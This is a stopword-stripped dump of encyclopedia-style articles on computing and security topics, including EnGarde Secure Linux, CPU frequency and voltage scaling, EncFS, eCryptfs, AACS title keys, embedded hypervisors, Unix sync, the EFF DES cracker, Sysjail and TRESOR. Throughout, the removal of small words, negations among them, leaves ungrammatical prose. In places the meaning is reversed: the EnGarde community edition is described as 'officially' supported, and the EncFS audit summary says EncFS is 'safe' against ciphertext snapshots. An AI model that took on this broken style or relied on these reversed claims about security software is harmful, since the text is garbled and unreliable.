    <t>engarde secure linux open source server-only linux distribution developed guardian digital. engarde incorporates open source tools postfix, bind, lamp stack. platform includes services hosting, email, others. since 2005, selinux incorporated platform default. other security services included default well, intrusion detection, anti-virus, network management auditing reporting tools. users configure services command line, remotely manage webtool, platform's browser-based interface. overview history development since inception 2001, platform developed incorporates server functionality focusing security priority. originally, platform loosely drew code early versions linux. within less year development, much re-engineered. since engarde treated platform, maintains package repository based rpm, among changes.additionally, many desktop functions included. example, engarde secure linux include window system. traditionally, practice called hardening. according company, platform engineered maintain focus security server functions. specific focus engarde secure linux earliest distributions include selinux complete server implementations, first linux server platforms designed solely security.because window system engarde configured graphical interface, recommended configure operating system using second computer. interface, accessible browser, remarkable features engarde secure linux. linux.com reviewed platform november 2005, webtool described innovative well-designed lets productive quickly. recent review polishlinux.org gave positive review, argued could included popular modules packages. engarde secure linux branches there branches engarde secure linux: community professional. community versionthis branch, also known engarde secure community engarde secure linux community edition, free downloadable version engarde secure linux distributed guardian digital, inc. this distribution "officially" supported guardian digital supports users engarde-users mailing list online forum.professional versionthis branch, also known engarde secure professional engarde secure linux professional edition, version engarde secure linux sold officially supported guardian digital, inc. development cycle guardian digital currently releasing platform updates upgrades every thirty sixty days. updates current users downloaded gdsn (guardian digital secure network): support system intended provide customers software updates, version upgrades, comprehensive technical support. gsdn designed connect engarde secure linux users expert security application engineers. release history developments guardian digital publishes detailed history website. there twenty releases since september 2005. some early design parameters included selinux functionality, 64-bit support, interfaces network intrusion detection, well translations spanish italian. other versions engarde currently translated languages. other changes include point-and-click using selinux, automatic hardware inventory generation webtool guide community modules. changes ajax interface real-time webtool support tool also changes. references external links official website engarde security linux selinux</t>
  </si>
  <si>
    <t>Dynamic frequency scaling</t>
  </si>
  <si>
    <t>dynamic frequency scaling (also known throttling) power management technique computer architecture whereby frequency microprocessor automatically adjusted fly" depending actual needs, conserve power reduce amount heat generated chip. dynamic frequency scaling helps preserve battery mobile devices decrease cooling cost noise quiet computing settings, useful security measure overheated systems (e.g. poor overclocking). dynamic frequency scaling almost always appear conjunction dynamic voltage scaling, since higher frequencies require higher supply voltages digital circuit yield correct results. combined topic known dynamic voltage frequency scaling (dvfs). processor throttling also known "automatic underclocking". automatic overclocking (boosting) also technically form dynamic frequency scaling, relatively usually discussed throttling. operation dynamic power (switching power) dissipated chip c·v2·a·f, capacitance switched clock cycle, voltage, activity factor indicating average number switching events clock cycle transistors chip unitless quantity) clock frequency.voltage therefore main determinant power usage heating. voltage required stable operation determined frequency circuit clocked, reduced frequency also reduced. dynamic power alone account total power chip, however, also static power, primarily various leakage currents. static power consumption asymptotic execution time shown energy consumption software shows convex energy behavior, i.e., exists optimal frequency energy consumption minimized.leakage current become important transistor sizes become smaller threshold voltage levels reduced. decade ago, dynamic power accounted approximately two-thirds total chip power. power loss leakage currents contemporary cpus socs tend dominate total power consumption. attempt control leakage power, high-k metal-gates power gating common methods. dynamic voltage scaling another related power conservation technique often used conjunction frequency scaling, frequency chip related operating voltage. efficiency electrical components, voltage regulators, decreases increasing temperature, power usage increase temperature. since increasing power increase temperature, increases voltage frequency increase system power demands even cmos formula indicates, vice versa. performance impact dynamic frequency scaling reduces number instructions processor issue given amount time, thus reducing performance. hence, generally used workload cpu-bound. dynamic frequency scaling rarely worthwhile conserve switching power. saving highest possible amount power requires dynamic voltage scaling too, component fact modern cpus strongly optimized power idle states. constant-voltage cases, efficient briefly peak speed stay deep idle state longer time (called "race idle" computational sprinting), reduced clock rate long time stay briefly light idle state. however, reducing voltage along clock rate change trade-offs. related-but-opposite technique overclocking, whereby processor performance increased ramping processor's (dynamic) frequency beyond manufacturer's design specifications. major difference modern systems overclocking mostly done front side (mainly multiplier normally locked), dynamic frequency scaling done multiplier. moreover, overclocking often static, dynamic frequency scaling always dynamic. software often incorporate overclocked frequencies frequency scaling algorithm, chip degradation risks allowable. support across vendors intel intel's throttling technology, speedstep, used mobile desktop lines. employs different throttling technologies. amd's cool'n'quiet technology used desktop server processor lines. cool'n'quiet save battery life, used amd's mobile processor line, instead purpose producing less heat, turn allows system spin slower speeds, resulting cooler quieter operation, hence name technology. amd's powernow! throttling technology used mobile processor line, though supporting cpus like k6-2+ found desktops well. powertune zerocore power dynamic frequency scaling technologies gpus. technologies technologies processors technology named longhaul (powersaver), transmeta's version called longrun. 36-processor asap chip among first multi-core processor chips support completely unconstrained clock operation (requiring frequencies maximum allowed) including arbitrary changes frequency, starts, stops. 167-processor asap chip first multi-core processor chip enables individual processors make fully unconstrained changes clock frequencies. according acpi specs, working state modern-day divided so-called "p"-states (performance states) allow clock rate reduction "t"-states (throttling states) throttle (but actual clock rate) inserting stpclk (stop clock) signals thus omitting duty cycles. different arm-based systems chip provide throttling. also dynamic voltage scaling clock gating (x86 instruction)power saving technologies: cool'n'quiet (desktop cpus) powernow! (laptop cpus) powertune/amd powerplay (graphics) intel speedstep (cpus)performance boosting technologies: turbo core (cpus) intel turbo boost (cpus) references</t>
  </si>
  <si>
    <t>EnRUPT</t>
  </si>
  <si>
    <t>enrupt block cipher family cryptographic algorithms based xxtea. enrupt hash function submitted sha-3 competition selected second round. references</t>
  </si>
  <si>
    <t>EncFS</t>
  </si>
  <si>
    <t>encfs free (lgpl) fuse-based cryptographic filesystem. transparently encrypts files, using arbitrary directory storage encrypted files.two directories involved mounting encfs filesystem: source directory, mountpoint. each file mountpoint specific file source directory corresponds file mountpoint provides unencrypted view source directory. filenames encrypted source directory. files encrypted using volume key, stored either within outside encrypted source directory. password used decrypt key. common uses linux, allows encryption home folders alternative ecryptfs. allows encryption files folders saved cloud storage (dropbox, google drive, onedrive, etc.). allows portable encryption file folders removable disks. available cross-platform folder encryption mechanism. increases storage security adding two-factor authentication (2fa). when encfs volume stored outside encrypted source directory physically separated location actual encrypted data, significantly increases security adding two-factor authentication (2fa). example, encfs able store unique volume anywhere else actual encrypted data, flash drive, network mount, optical disc cloud. addition password could required decrypt volume key. advantages encfs offers several advantages disk encryption software simply file stored individually encrypted file elsewhere host's directory tree. cross-platform encfs available multiple platforms, whereas ecryptfs tied linux kernel bitrot detection encfs implements bitrot detection underlying filesystem scalable storage encfs "volumes" occupy fixed size encrypted directories grow shrink files added removed mountpoint normal file server encfs's encrypted directory located normal file server (via nfs, sshfs, etc.) mirrored backed efficiently normal file-system tools, rsync different physical devices possible directories mountpoint exist different physical devices, filesystem mounted sub-directories source directory faster backup backup utilities back files changed source directory (file synchronisation, cloud storage) reduced corruption corruption data isolated. corruption filedata local single file, data corruption filesystem corrected reliable filesystem repair utility like fsck. some whole-disk encryption systems lack attributes. optimizations since file modifications shine underlying file system, various optimizations operating system still possible unlike full-disk encryption. example, passing information released space (trim) improve performance drives. also supported dm-crypt. random file access files accessed random. can, example, skip middle large encrypted video without decrypting whole file. disadvantages there drawbacks using encfs. compatibility mounted encfs directories share features restrictions filesystem containing source directory. support long filenames encryption, filenames encrypted files produced encfs longer original filenames. therefore, filenames whose length close maximum supported filesystem cannot stored encfs, since exceed length limit encryption. most filesystems limit filenames bytes; case, encfs supports filenames bytes. general security concerns anyone access source directory able many files encrypted filesystem, permissions have, approximate size, last time accessed modified, though file names file data encrypted. encfs security concerns paid security audit conducted february 2014, revealed several potential vulnerabilities. concludes: encfs probably safe long adversary gets copy ciphertext nothing more. encfs safe adversary opportunity snapshots ciphertext different times. encfs attempts protect files malicious modification, serious problems feature. encfs security concerns announcement encfs included several underlying design changes, acknowledging security concerns raised previous audit. however, certain concerns still remain regarding vulnerabilities. filesystem options when creating encfs volume, several different options available customize filesystem suit various needs. cipher algorithm encfs uses whatever ciphers able locate various encryption libraries system. blowfish typically available. cipher length (keysize) selected ciphers support variable lengths. block size each file encrypted blocks, option controls size blocks are. each time single byte read entire block contained must decrypted. likewise, write block must decrypted, altered, re-encrypted. default block size 1024 sufficient purposes. filename encoding filenames source directory plain encrypted block stream mode. block mode obscures filename length somewhat, stream mode keeps short possible, might save space source directory's filesystem depending filesystem manages directory tree. filename chaining when enabled, initialization vector filename encryption derived file's parent directories, causing files name different directories different encrypted filenames. directory renamed, files directories contained therein need encrypted filenames re-encrypted, expensive operation. this option disabled heavily populated directories renamed often. per-file initialization vector when enabled, file encrypted random 8-byte initialization vector, stored within encrypted file source directory. option disabled, file encrypted initialization vector, make volume easier break. enabling option makes filesystem secure cost additional bytes file. external chaining causes file data initialization vector derived filename's initialization vector chain. data encrypted differently given different filename directory. consequently, renaming file mode enabled requires either file's random initialization vector offset change filename initialization vector chain, data re-encoded. authors encfs chosen former route considerably faster, especially large files. filename header chaining makes encoding depend full pathname. renaming moving means reencoding. hardlinks supported. block headers stores checksum encrypted block, causing corruption modification encrypted files detected encfs. checksum (blockmacbytes) bytes, optionally additional bytes random data (blockmacrandbytes) added block prevent blocks unencrypted data checksum. this option creates large amount overhead, block's checksum must calculated data read verify integrity) written update checksum). also disk encryption filesystem-level encryption list cryptographic file systems list file systems references external links encfs manpage safe: another per-file implementation windows kernel mode driver (slower), fully open source boxcryptor: proprietary software based encfs windows, android, encfsmp: implementation runs windows</t>
  </si>
  <si>
    <t>Encrypted Title Key</t>
  </si>
  <si>
    <t>encrypted title encrypted belongs anticopy advanced access content system (aacs). this included media block system important part content protection process blu-ray hd-dvd contents. what used for? main objective encrypted title reinforce discs’ content security decryption process content stored media. content stored medias like blu-ray hd-dvds composed divided information units called titles. owner protected contents, divide information form titles. also provides license player, series rules called usage rules used later decrypt disc information. protect content, information units encrypted using encryption keys called title keys. achieve security obtention process cannot obtained player without license, title keys encrypted giving result encrypted title keys. licensed replicator shall select secret, random title title protected. each title shall used encrypt content corresponding title, specified supported content format elsewhere specification. replicator’s discretion, given title encrypted using title instances pre-recorded media, different title keys used different instances. decryption procedure players license achieve reading discs’ content, decryption procedures achieving reading. discs volume identifier called (volume id), encrypted title decryption (media block). players keys, according model, called device keys, granted aacs organization. reproduction moment, keys decrypts contained disc result process, media key, obtained. media combined (volume volume unique (kvu) originated decryption encrypted title finally done consequence necessary title obtained decrypt reproduce discs’ content.to codify encrypted title key, codification made following next formula: aes-128e (kvu, nonce aes_h(volume title_id)) possible demonstrate, simple analysis formula, result obtained combination volume title identifier obtained media key, giving result (volume unique key). decryption problems although process updating title keys application usually takes small amount time (much less second), critical time. device fail re-encryption process, user's content might lost. reduce risk user loss, recording devices shall begin reencryption process renaming temporary name writing mkb. when device completes re-encryption process, shall delete temporary mkb. recorder discovers temporary piece media, indication encrypted title keys might corrupted. device shall perform following protocols recover corrupted encrypted title keys. which protocol chosen depends encrypted title keys stored particular application. device re-encrypting title keys normal result updating recordable shall also protocols. these protocols are: recovery protocol when encrypted title keys separate file: case, original recording device shall rename encrypted title keys defined temporary name beginning write encrypted title file. -recovery protocol when encrypted title keys content file: extreme case, content file contains encrypted title key. case, likely temporary version encrypted title keys. where located? encrypted title keys located blu-ray hd-dvds content reproduce player license. information stored discs found divided three different parts: reading/writing area, read-only area protected area. encrypted title keys found reading/writing area media block, usage rules encrypted content. sources introduction common cryptographic elements 0.91 aacs technical overview 7/2004 references external links aacs page accs users guide</t>
  </si>
  <si>
    <t>EmbeddedXEN</t>
  </si>
  <si>
    <t>embeddedxen type-1 (bare metal) hypervisor based open source hypervisor citrix.embeddedxen results several years research field arm-based cpus hypervisor technology based xen. overall architecture revisited order support hardware diversity cpus platforms provide excellent framework deal native third-party cross-compiled different cpu. embeddedxen provide virtualized hardware interface third-party embeddedxen initiated current development reconfigurable embedded digital systems (reds) institute heig-vd, switzerland. embeddedxen released open source project sourceforge.from march 2020, novel framework called (smart object oriented) released gitlab. followed evolution deep changes embeddedxen (also called embx) many years. embeddedxen considered development basis origin soo. references</t>
  </si>
  <si>
    <t>Embedded hypervisor</t>
  </si>
  <si>
    <t>embedded hypervisor hypervisor supports requirements embedded systems. requirements embedded hypervisor distinct hypervisors targeting server desktop applications. embedded hypervisor designed embedded device outset, rather loaded subsequent device deployment. while desktop enterprise environments hypervisors consolidate hardware isolate computing environments another, embedded system, various components typically function collectively provide device's functionality. mobile virtualization overlaps embedded system virtualization, shares cases. typical attributes embedded virtualization include efficiency, security, communication, isolation real-time capabilities. background software virtualization major topic enterprise space since late 1960s, since early 2000s appeared embedded systems. virtualization implementation form hypervisor embedded systems different enterprise applications. effective implementation embedded hypervisor must deal number issues specific applications. these issues include highly integrated nature embedded systems, requirement isolated functional blocks within system communicate rapidly, need real-time/deterministic performance, resource-constrained target environment wide range security reliability requirements. hypervisor hypervisor provides software virtualization environments software, including operating systems, appearance full access underlying system hardware, fact access complete control hypervisor. these virtual environments called virtual machines (vm)s, hypervisor typically support multiple managed simultaneously. classification hypervisors generally classed either type type depending whether hypervisor runs exclusively supervisor mode privileged mode (type hosted operating system regular application (type type hypervisors manage system resources required maintain control virtual machines, facilitate minimal trusted computing base (tcb). type hypervisors typically application within general purpose operating system, relying services manage system resources. nowadays kernel extensions often loaded take advantage hardware virtualization support. embedded hypervisor embedded hypervisor often type hypervisor supports requirements embedded systems development. references detailed discussion. these requirements summarized below. small, fast hypervisor support multiple isolated vms; support lightweight secure encapsulation medium-grain subsystem components interact strongly; high-bandwidth, low-latency communication system components, subject configurable, system-wide security policy; minimal impact system resources support real-time latency guarantees; ability implement scheduling policy provide support real-time system components; implementation embedded hypervisor typically provides multiple vms, emulates hardware platform virtualised software executes. emulate underlying native hardware, case embedded code runs real machine virtual machine vice versa. emulation native hardware always possible desired, virtual platform defined instead. when provides virtual platform, guest software ported environment, however since virtual platform defined without reliance native hardware, guest software supporting virtual platform unmodified across various distinct hardware platforms supported hypervisor. embedded hypervisors employ either paravirtualization virtualization features underlying cpu. paravirtualization required cases hardware assist, involves often extensive modifications core architecture support core guest kernels. emulation hardware register level rarely seen embedded hypervisors complex slow. custom nature embedded systems means need support unmodified binary-only guest software require techniques rare. size efficiency implementation also issue embedded hypervisor, embedded systems often much resource constrained desktop server platforms. also desirable hypervisor maintain, closely possible, native speed, real-time response determinism power efficiency underlying hardware platform. hypervisor design implementations embedded systems applications commonly based small microkernel separation kernel designs, virtualization built-in integral capability. this introduced pikeos 2005. examples approaches produced companies open kernel labs (microkernel followed separation kernel) lynuxworks (separation kernel). virtuallogix appears take position approach based dedicated virtual machine monitor (vmm) would even smaller efficient. this issue subject ongoing debate. however, main point issue sides discussion speed size implementation (for given level functionality) major importance. example: hypervisors embedded must real-time capable, well resource-miserly." resource requirements embedded systems typically highly resource constrained cost technical limitations hardware. therefore important embedded hypervisor efficient possible. microkernel separation kernel based designs allow small efficient hypervisors. thus embedded hypervisors usually memory footprint several tens several hundred kilobytes, depending efficiency implementation level functionality provided. implementation requiring several megabytes memory more) generally acceptable. with small type embedded hypervisor, system made highly secure reliable. standard software-engineering techniques, code inspections systematic testing, used reduce number bugs small code base tiny fraction defects must expected hypervisor guest combination 100,000–300,000 lines total. communication important functions required embedded hypervisor secure message-passing mechanism, needed support real-time communication processes. embedded environment, system typically number closely coupled tasks, require secure isolation other. virtualized environment, embedded hypervisor support enforce isolation multiple vms. these therefore require access mechanism provides low-latency communication tasks. inter-process communication (ipc) mechanism used provide functions, well invoking system services, implemented manner ensures desired level isolation maintained. also, significant impact system performance, mechanism highly optimised minimal latency. hardware requirements embedded hypervisor needs complete control system resources, including memory accesses, ensure software cannot break hypervisor therefore requires target provide memory management support (typically using mmu). many embedded processors including arm, mips powerpc followed desktop server chip vendors adding hardware support virtualization. there still large proportion embedded processors however provide support hypervisor supporting paravirtualization required. processors notable application class processor designs support technology called trustzone, provides essentially hardware support privileged unprivileged normally minimal trusted execution environment (tee) secure world native kernel running non-secure world. cases some common cases embedded hypervisor are:1. independence designers embedded systems many hardware drivers system services specific target platform. support required platform, either concurrently consecutively using common hardware design, embedded hypervisor greatly simplify task. such drivers system services implemented virtualized environment; services available hosted this level abstraction also allows embedded developer implement change driver service either hardware software point, without apparent hosted support multiple operating systems single processor typically used real-time operating system (rtos) low-level real-time functionality (such communication stack) time running general purpose (gpos) like linux windows, support user applications, browser calendar. objective might upgrade existing design without added complexity second processor, simply minimize bill materials (bom). system security embedded hypervisor able provide secure encapsulation subsystem defined developer, compromised subsystem cannot interfere subsystems. example, encryption subsystem needs strongly shielded attack prevent leaking information encryption supposed protect. embedded hypervisor encapsulate subsystem enforce required security policies communication subsystem. system reliability encapsulation subsystem components ensures failure subsystem cannot impact subsystems. this encapsulation keeps faults propagating subsystem subsystem another improving reliability. this also allow subsystem automatically shut restarted fault detection. this particularly important embedded device drivers, highest density fault conditions seen occur, thus common cause failure system instability. also allows encapsulation operating systems necessarily built reliability standards demanded system design. dynamic update system software subsystem software applications securely updated tested integrity, downloading secure “going live” executing system. even process fails, system revert former state restarting original software subsystem/application, without halting system operation. legacy code re-use virtualization allows legacy embedded code used environment developed validated with, freeing developer different environment separate services applications. legacy embedded code, written particular system configuration assume exclusive control system resources memory, processor. this code base re-used unchanged alternative system configurations memory present resource functionality consistent original system configuration, effectively de-coupling legacy code specifics modified hardware design. where access operating system source code available, paravirtualization commonly used virtualize os’s processors without hardware virtualization support, thus applications supported also unmodified without re-compilation hardware platform designs. even without source access, legacy binary code executed systems running processors hardware virtualization support amd-v, intel technologies latest processors virtualization support. legacy binary code could completely unmodified resource mapping handled embedded hypervisor, assuming system hardware provides equivalent functionality. protection valuable proprietary need protection theft misuse embedded platform shipped development work (for example) customer. embedded hypervisor makes possible restrict access system software components specific part system containing needs protected. software license segregation software operating licensing scheme separated software operating different scheme. example, embedded hypervisor provide isolated execution environment proprietary software sharing processor open source software subject gpl.9. migration applications uni-core multi-core systems processors utilise multi-core architectures increase performance, embedded hypervisor manage underlying architecture present uni-processor environment legacy applications operating systems efficiently using multiprocessor system design. change hardware environment require change existing software. commercial products crucible star corp. cross-os hypervisor allows applications natively single platform mapusoft technologies, inc. okl4 hypervisor supports based smart connected devices (embedded, mobile). used defense security sensitive applications. supported commercially systems. references</t>
  </si>
  <si>
    <t>Sync (Unix)</t>
  </si>
  <si>
    <t>sync standard system call unix operating system, commits data kernel filesystem non-volatile storage buffers, i.e., data scheduled writing low-level system calls. higher-level layers stdio maintain separate buffers own. function sync() call typically declared void sync(void) &lt;unistd.h&gt;. system call also available command line utility also called sync, similarly named functions languages perl node.js module). related system call fsync() commits buffered data relating specified file descriptor. fdatasync() also available write changes made data file, necessarily file's related metadata.some unix systems kind flush update daemon, calls sync function regular basis. systems, cron daemon this, linux handled pdflush daemon replaced implementation finally removed linux kernel 2012. buffers also flushed filesystems unmounted remounted read-only, example prior system shutdown. database order provide proper durability, databases need form sync order make sure information written made non-volatile storage rather stored memory-based write cache would lost power failed. postgresql example variety different sync calls, including fsync() fdatasync(), order commits durable. unfortunately, single client writing series records, rotating hard drive commit rotation, makes best hundred commits second. turning fsync requirement therefore greatly improve commit performance, expense potentially introducing database corruption crash. databases also employ transaction files (typically much smaller main data files) information recent changes, changes reliably redone case crash; main data files synced less often. error reporting checking avoid data loss return values fsync() checked performing operations buffered library kernel, errors reported time using write() system call fflush() call, since data written non-volatile storage written memory page cache. errors writes instead often reported system calls fsync(), msync() close(). prior 2018, linux's fsync() behavior certain circumstances failed report error status, change behavior proposed april 2018. performance controversies hard disks default using volatile write cache buffer writes, greatly improves performance introducing potential lost writes. tools hdparm instruct controller flush on-drive write cache buffer. performance impact turning caching large even normally conservative freebsd community rejected disabling write caching default freebsd 4.3.in scsi sata native command queuing (but plain ata, even tcq) host specify whether wants notified completion data hits disk's platters hits disk's buffer (on-board cache). assuming correct hardware implementation, feature allows disk's on-board cache used guaranteeing correct semantics system calls like fsync. this hardware feature called force unit access (fua) allows consistency less overhead flushing entire cache done sata non-ncq) disks. although linux enabled around 2007, enable sata/ncq 2012, citing lack support early drives.firefox 3.0, released 2008, introduced fsync system calls found degrade performance; call introduced order guarantee integrity embedded sqlite database.linux foundation chief technical officer theodore ts'o claims need "fear fsync", real cause firefox slowdown excessive fsync. also concedes however (quoting mike shaver) rather common linux configurations, especially using ext3 filesystem "data=ordered" mode, calling fsync flush data file called rather buffered data filesystem. also buffer cache inode references external links sync(8) linux page http://austingroupbugs.net/view.php?id=672</t>
  </si>
  <si>
    <t>Dynamic voltage scaling</t>
  </si>
  <si>
    <t>dynamic voltage scaling power management technique computer architecture, voltage used component increased decreased, depending upon circumstances. dynamic voltage scaling increase voltage known overvolting; dynamic voltage scaling decrease voltage known undervolting. undervolting done order conserve power, particularly laptops mobile devices, energy comes battery thus limited, rare cases, increase reliability. overvolting done order support higher frequencies performance. term "overvolting" also used refer increasing static operating voltage computer components allow operation higher speed (overclocking). background mosfet-based digital circuits operate using voltages circuit nodes represent logical state. voltage nodes switches high voltage voltage normal operation—when inputs logic gate transition, transistors making gate toggle gate's output. node circuit certain amount capacitance. capacitance thought measure long takes given current produce given voltage change. capacitance arises various sources, mainly transistors (primarily gate capacitance diffusion capacitance) wires (coupling capacitance). toggling voltage circuit node requires charging discharging capacitance node; since currents related voltage, time takes depends voltage applied. applying higher voltage devices circuit, capacitances charged discharged quickly, resulting faster operation circuit allowing higher frequency operation. methods many modern components allow voltage regulation controlled software (for example, bios). usually possible control voltages supplied cpu, ram, pci, express agp) port pc's bios. however, components allow software control supply voltages, hardware modification required overclockers seeking overvolt component extreme overclocks. video cards motherboard northbridges components frequently require hardware modifications change supply voltages. these modifications known "voltage mods" "vmod" overclocking community. undervolting undervolting reducing voltage component, usually processor, reducing temperature cooling requirements, possibly allowing omitted. just like overclocking, undervolting highly subject so-called silicon lottery: undervolt slightly better vice versa. power switching power dissipated chip using static cmos gates {\displaystyle c\cdot v^{2}\cdot capacitance switched clock cycle, supply voltage, switching frequency, part power consumption decreases quadratically voltage. formula exact however, many modern chips implemented using 100% cmos, also special memory circuits, dynamic logic domino logic, etc. moreover, also static leakage current, become accentuated feature sizes become smaller (below nanometres) threshold levels lower. accordingly, dynamic voltage scaling widely used part strategies manage switching power consumption battery powered devices cell phones laptop computers. voltage modes used conjunction lowered clock frequencies minimize power consumption associated components cpus dsps; significant computational power needed voltage frequency raised. some peripherals also support voltage operational modes. example, power cards well driver stacks conserve power switching lower voltage detecting card supports when leakage current significant factor terms power consumption, chips often designed portions powered completely off. this usually viewed dynamic voltage scaling, transparent software. when sections chips turned off, example omap3 processors, drivers support software need support that. program execution speed speed digital circuit switch states "low" (vss) "high" (vdd) vice versa proportional voltage differential circuit. reducing voltage means circuits switch slower, reducing maximum frequency circuit run. this, turn, reduces rate program instructions issued, increase time program segments sufficiently cpu-bound. this highlights dynamic voltage scaling generally done conjunction dynamic frequency scaling, least cpus. there complex tradeoffs consider, depend particular system, load presented power management goals. when quick responses needed, clocks voltages might raised (mobile sensors context-aware computing) together. otherwise, kept maximize battery life. implementations 167-processor asap chip enables individual processors make extremely fast order 1-2ns) locally controlled changes supply voltages. processors connect local power grid either higher (vddhi) lower (vddlow) supply voltage, entirely either grid dramatically leakage power. another approach uses per-core on-chip switching regulators dynamic voltage frequency scaling (dvfs). operating system unix system provides userspace governor, allowing modify frequencies (though limited hardware capabilities). system stability dynamic frequency scaling another power conservation technique works principles dynamic voltage scaling. both dynamic voltage scaling dynamic frequency scaling used prevent computer system overheating, result program operating system crashes, possibly hardware damage. reducing voltage supplied manufacturer's recommended minimum setting result system instability. temperature efficiency electrical components, voltage regulators, decreases increasing temperature, power used increase temperature causing thermal runaway. increases voltage frequency increase system power demands even faster cmos formula indicates, vice versa. caveats primary caveat overvolting increased heat: power dissipated circuit increases square voltage applied, even small voltage increases significantly affect power. higher temperatures, transistor performance adversely affected, threshold, performance reduction heat exceeds potential gains higher voltages. overheating damage circuits occur quickly using high voltages. there also longer-term concerns: various adverse device-level effects carrier injection electromigration occur rapidly higher voltages, decreasing lifespan overvolted components. also dynamic voltage frequency scaling (dvfs) dynamic frequency scaling power gating power–delay product (pdp) energy–delay product (edp) switched-mode power supply applications (smps) applications switching energy power ramp overvoltage undervoltage references further reading gaudet, vincent (2014-04-01) [2013-09-25]. "chapter 4.1. low-power design techniques state-of-the-art cmos technologies". steinbach, bernd (ed.). recent progress boolean domain ed.). newcastle upon tyne, cambridge scholars publishing. 187–212. isbn 978-1-4438-5638-6. retrieved 2019-08-04. (455 pages)</t>
  </si>
  <si>
    <t>TLS-PSK</t>
  </si>
  <si>
    <t>transport layer security pre-shared ciphersuites (tls-psk) cryptographic protocols provide secure communication based pre-shared keys (psks). these pre-shared keys symmetric keys shared advance among communicating parties. there several cipher suites: first ciphersuites symmetric operations authentication. second diffie–hellman exchange authenticated pre-shared key. third combine public authentication server pre-shared authentication client. usually, transport layer security (tls) uses public certificates kerberos authentication. tls-psk uses symmetric keys, shared advance among communicating parties, establish connection. there several reasons psks: using pre-shared keys can, depending ciphersuite, avoid need public operations. this useful used performance-constrained environments limited power. pre-shared keys convenient management point view. instance, closed environments connections mostly configured manually advance, easier configure certificates. another case parties already mechanism setting shared secret key, mechanism could used “bootstrap” authenticating connection. standards 4279: "pre-shared ciphersuites transport layer security (tls)". 4785: "pre-shared (psk) ciphersuites null encryption transport layer security (tls)". 5487: "pre-shared cipher suites sha-256/384 galois counter mode". 5489: "ecdhe_psk cipher suites transport layer security (tls)". also transport layer security secure remote password (tls-srp) galois counter mode (gcm) elliptic curve diffie–hellman (ecdhe) null encryption sha-256 references</t>
  </si>
  <si>
    <t>Sysjail</t>
  </si>
  <si>
    <t>sysjail defunct user-land virtualiser systems supporting systrace library version limited openbsd, netbsd miros. original design inspired freebsd jail, similar utility (although part kernel) freebsd. sysjail developed released 2006 kristaps dzonsons (aka johnson), research assistant game theory stockholm school economics, maikls deksters.sysjail re-written scratch 2007 support emulated processes jails, limited (initially) linux emulation. project officially discontinued march 2009 flaws inherent syscall wrapper-based security architectures. restrictions sysjail could evaded exploiting race conditions wrapper's security checks kernel's execution syscalls. references external links sysjail: systrace user-land virtualisation sysjail (nycbsdcon2006 presentation)</t>
  </si>
  <si>
    <t>EFF DES cracker</t>
  </si>
  <si>
    <t>cryptography, cracker (nicknamed "deep crack") machine built electronic frontier foundation (eff) 1998, perform brute force search data encryption standard (des) cipher's space decrypt encrypted message trying every possible key. prove size sufficient secure. background uses 56-bit key, meaning possible keys message encrypted. this exactly 72,057,594,037,927,936, approximately quadrillion possible keys. major criticisms des, proposed 1975, size short. martin hellman whitfield diffie stanford university estimated machine fast enough test many keys would cost million 1976, affordable national intelligence agencies national security agency. subsequent advances price/performance chips kept reducing cost until, twenty years later, became affordable even small nonprofit organization mount realistic attack. challenges federal standard, government encouraged non-classified data. security wished demonstrate des's length enough ensure security, challenges 1997, offering monetary prize. first challenge solved days deschall project rocke verser loveland, colorado. security challenge ii-1, solved distributed.net days january february 1998.in 1998, built deep crack (named reference ibm's deep blue chess computer) less $250,000. response challenge ii-2, july 1998, deep crack decrypted des-encrypted message hours work, winning $10,000. brute force attack showed cracking actually practical proposition. most governments large corporations could reasonably build machine like deep crack. months later, response security's challenge iii, collaboration distributed.net, used deep crack decrypt another des-encrypted message, winning another $10,000. this time, operation took less hours minutes. decryption completed january 1999. october year, reaffirmed federal standard, time standard recommended triple des. small space relatively high computational costs triple resulted replacement federal standard, effective 2002. technology deep crack designed cryptography research, inc., advanced wireless technologies, eff. principal designer paul kocher, president cryptography research. advanced wireless technologies built 1856 custom asic chips (called deep crack awt-4500), housed circuit boards chips each. boards fitted cabinets mounted sun-4/470 chassis. search coordinated single assigned ranges keys chips. entire machine capable testing billion keys second. would take days test every possible rate. average, correct would found half time. 2006, another custom hardware attack machine designed based fpgas. copacobana (cost-optimized parallel codebreaker) able crack considerably lower cost. this advantage mainly progress integrated circuit technology. july 2012, security researchers david hulton moxie marlinspike unveiled cloud computing tool breaking ms-chapv2 protocol recovering protocol's encryption keys brute force. this tool effectively allows members general public recover known plaintext–ciphertext pair hours. references external links cracker page eff's site photos machine cryptography research's site copacobana, off-the-shelf cracking device fpga implementation using virtex-6 lx240ts asic design 1994 could crack hours custom chips</t>
  </si>
  <si>
    <t>ECryptfs</t>
  </si>
  <si>
    <t>ecryptfs (enterprise cryptographic filesystem) package disk encryption software linux. implementation posix-compliant filesystem-level encryption layer, aiming offer functionality similar gnupg operating system level, part linux kernel since version 2.6.19. ecryptfs package included ubuntu since version 9.04 implement ubuntu's encrypted home directory feature, deprecatedecryptfs derived erez zadok's cryptfs. uses variant openpgp file format encrypted data, extended allow random access, storing cryptographic metadata (including per-file randomly generated session key) individual file.it also encrypts file directory names makes internally longer (average third). reason needs uuencode encrypted names eliminate unwanted characters resulting name. this lowers maximum usable byte name length original file system entry depending used file system (this lead four times fewer characters example asian utf-8 file names). also disk encryption disk encryption software comparison disk encryption software encfs dm-crypt filevault encrypting file system references external links archwiki: system encryption ecryptfs ecryptfs cryptfs: stackable vnode level encryption file system (zadok al., 1999)</t>
  </si>
  <si>
    <t>TRESOR</t>
  </si>
  <si>
    <t>tresor (recursive acronym "tresor runs encryption securely outside ram", also german word safe) linux kernel patch provides encryption using defend cold boot attacks computer systems performing encryption inside registers rather random-access memory (ram). proposed solutions general-purpose computers. other, called "frozen cache" uses cache instead. developed predecessor aesse, presented eurosec 2010 presented usenix security 2011. authors state allows treated untrusted security viewpoint without hindering system. motivation computer security, common problem data security intruder access encrypted data computer. modern encryption algorithms, correctly implemented strong passwords, often unbreakable current technology, emphasis moved techniques bypass requirement, exploiting aspects data security encryption "broken" much less effort, else bypassed completely. cold boot attack means intruder defeat encryption despite system security, gain physical access running machine. premised physical properties circuitry within memory devices commonly used computers. concept computer system encrypted data open, encryption keys used read write data usually stored temporary basis physical memory, plain readable form. (holding keys "plain" form hard impossible avoid usual systems since system must able access data instructed authorized user). usually benefit unauthorised intruder, cannot access keys—for example security built software system. however, memory devices accessed outside running system without loss contents, example quickly restarting computer removing devices different device, current contents—including encryption keys use—can plainly read used. this important system cannot used view, copy access 